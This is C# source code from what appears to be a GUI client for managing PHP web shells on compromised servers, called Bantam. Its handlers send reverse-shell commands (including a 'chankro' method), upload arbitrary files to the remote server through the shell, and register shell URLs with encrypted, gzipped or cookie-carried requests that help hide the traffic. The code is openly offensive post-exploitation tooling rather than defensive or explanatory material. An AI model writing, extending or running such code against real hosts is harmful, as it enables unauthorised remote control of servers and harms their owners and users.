/// <summary> /// Task wrapper for popping reverse shell without chankro /// </summary> /// <param name="shellCode"></param> private async Task PopReverseShell(string shellCode) { string phpCode = PhpBuilder.ExecuteSystemCode(shellCode, false); await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false)); if (checkBoxLogShellCode.Checked) { LogHelper.AddShellLog(ShellUrl, "Attempted to pop chankro reverse shell with [ " + shellCode + " ] ", LogHelper.LOG_LEVEL.REQUESTED); } }
/// <summary> /// Main upload routine /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private async void btnUpload_Click(object sender, EventArgs e) { string phpCode = string.Empty; btnBrowse.Enabled = false; btnUpload.Enabled = false; richTextBox1.Enabled = false; if (EditingSelf) { if (!string.IsNullOrEmpty(richTextBox1.Text)) { phpCode = Helper.EncodeBase64ToString(richTextBox1.Text); } else { LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data to self...", LogHelper.LOG_LEVEL.INFO); btnUpload.Enabled = true; return; } phpCode = PhpBuilder.WriteFileVar(PhpBuilder.phpServerScriptFileName, phpCode); } else { if (!string.IsNullOrEmpty(LocalFileLocation)) { phpCode = Convert.ToBase64String(File.ReadAllBytes(LocalFileLocation)); } else if (!string.IsNullOrEmpty(richTextBox1.Text)) { phpCode = Helper.EncodeBase64ToString(richTextBox1.Text); } else { LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data...", LogHelper.LOG_LEVEL.INFO); btnUpload.Enabled = true; return; } string remoteFileLocation = ServerPath + "/" + txtBoxFileName.Text; phpCode = PhpBuilder.WriteFile(remoteFileLocation, phpCode); } await WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode); btnUpload.Enabled = true; btnBrowse.Enabled = true; richTextBox1.Enabled = true; this.Close(); }
/// <summary> /// Task wrapper for spawning a chankro shell /// </summary> /// <param name="phpCode"></param> private async Task PopChankroShell(string phpCode) { await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false)); }
/// <summary> /// Main add shell/host To GUI routine /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private async void btnAddShell_Click(object sender, EventArgs e) { string shellURL = txtBoxShellUrl.Text; if (string.IsNullOrEmpty(shellURL)) { return; } if (checkBoxEncryptRequest.Checked) { string encryptionKey = textBoxEncrpytionKey.Text; if (encryptionKey.Length != 32) { labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again."; return; } if (!checkBoxSendIVInRequest.Checked) { string encryptionIV = textBoxEncrpytionIV.Text; if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16) { labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again."; return; } } } //Remove Shell if (BantamMain.Shells.ContainsKey(shellURL)) { BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL); if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut)) { LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR); return; } } //Add Shell if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo())) { LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR); return; } BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text; if (comboBoxVarType.Text == "cookie") { BantamMain.Shells[shellURL].SendDataViaCookie = true; } if (checkBoxResponseEncryption.Checked == false) { BantamMain.Shells[shellURL].ResponseEncryption = false; } else { BantamMain.Shells[shellURL].ResponseEncryption = true; BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex; } if (checkBoxGZipRequest.Checked) { BantamMain.Shells[shellURL].GzipRequestData = true; } else { BantamMain.Shells[shellURL].GzipRequestData = false; } bool encryptResponse = BantamMain.Shells[shellURL].ResponseEncryption; int ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode; if (checkBoxEncryptRequest.Checked) { BantamMain.Shells[shellURL].RequestEncryption = true; BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text; if (checkBoxSendIVInRequest.Checked) { BantamMain.Shells[shellURL].SendRequestEncryptionIV = true; BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty; BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text; } else { BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text; BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty; } } else { BantamMain.Shells[shellURL].RequestEncryption = false; BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty; BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty; BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty; } string phpCode = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse); ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode); if (string.IsNullOrEmpty(response.Result)) { labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again."; BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut); return; } string result = response.Result; if (encryptResponse) { result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode); } if (string.IsNullOrEmpty(result) || result != "1") { labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again."; BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut); return; } BantamMain.Instance.InitializeShellData(shellURL); this.Close(); }